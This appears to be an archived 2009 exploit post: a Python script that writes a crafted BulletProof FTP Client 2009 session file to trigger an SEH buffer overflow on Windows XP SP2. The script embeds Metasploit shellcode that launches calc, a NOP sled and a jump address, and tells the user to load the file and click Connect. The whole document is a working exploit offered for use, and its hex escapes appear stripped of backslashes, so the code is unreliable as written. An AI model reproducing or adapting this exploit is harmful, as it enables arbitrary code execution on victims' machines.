bulletproof2009-overflow.txt
Posted on 14 April 2009
#!/usr/bin/python #[*] Bug : BulletProof FTP Client 2009 (.bps) Buffer Overflow Exploit (SEH) #[*] Credits : Stack #[*] Tested on : Xp sp2 (fr) #[*] Exploited by : His0k4 #[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com #[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D #[*] translate by Cyb3r-1st: esse7 embe7 embou :D # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com shellcode=( "x33xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x71" "x4fxd8x8dx83xebxfcxe2xf4x8dxa7x9cx8dx71x4fx53xc8" "x4dxc4xa4x88x09x4ex37x06x3ex57x53xd2x51x4ex33xc4" "xfax7bx53x8cx9fx7ex18x14xddxcbx18xf9x76x8ex12x80" "x70x8dx33x79x4ax1bxfcx89x04xaax53xd2x55x4ex33xeb" "xfax43x93x06x2ex53xd9x66xfax53x53x8cx9axc6x84xa9" "x75x8cxe9x4dx15xc4x98xbdxf4x8fxa0x81xfax0fxd4x06" "x01x53x75x06x19x47x33x84xfaxcfx68x8dx71x4fx53xe5" "x4dx10xe9x7bx11x19x51x75xf2x8fxa3xddx19xbfx52x89" "x2ex27x40x73xfbx41x8fx72x96x2cxb9xe1x12x4fxd8x8d") header1=( "x54x68x69x73x20x69x73x20x61x20x42x75x6cx6cx65x74" "x50x72x6fx6fx66x20x46x54x50x20x43x6cx69x65x6ex74" "x20x53x65x73x73x69x6fx6ex2dx46x69x6cx65x20x61x6e" "x64x20x73x68x6fx75x6cx64x20x6ex6fx74x20x62x65x20" "x6dx6fx64x69x66x69x65x64x20x64x69x72x65x63x74x6c" "x79x2ex0dx0a") exploit = "passwords.hotmail.com" exploit += "x90"*68 exploit += "x74x06x90x90" #oplaa! exploit += "x98x6AxBFx74" #oleacc.dll (xp sp2) exploit += shellcode header2=( "x0ax32x31x0dx0ax41x42x41x42x43x0dx0ax62x70x68x67x71" "x64x6ex62x6ax6ax67x61x65x62x0dx0ax63x3ax5cx0dx0a" "x2fx0dx0a") vuln = header1 + exploit + header2 try: out_file = open("sploit.bps",'w') out_file.write(vuln) out_file.close() print " Session file created! Now Go to: file>Load BP Session then chose it and clic Connect " except: print "Error!"
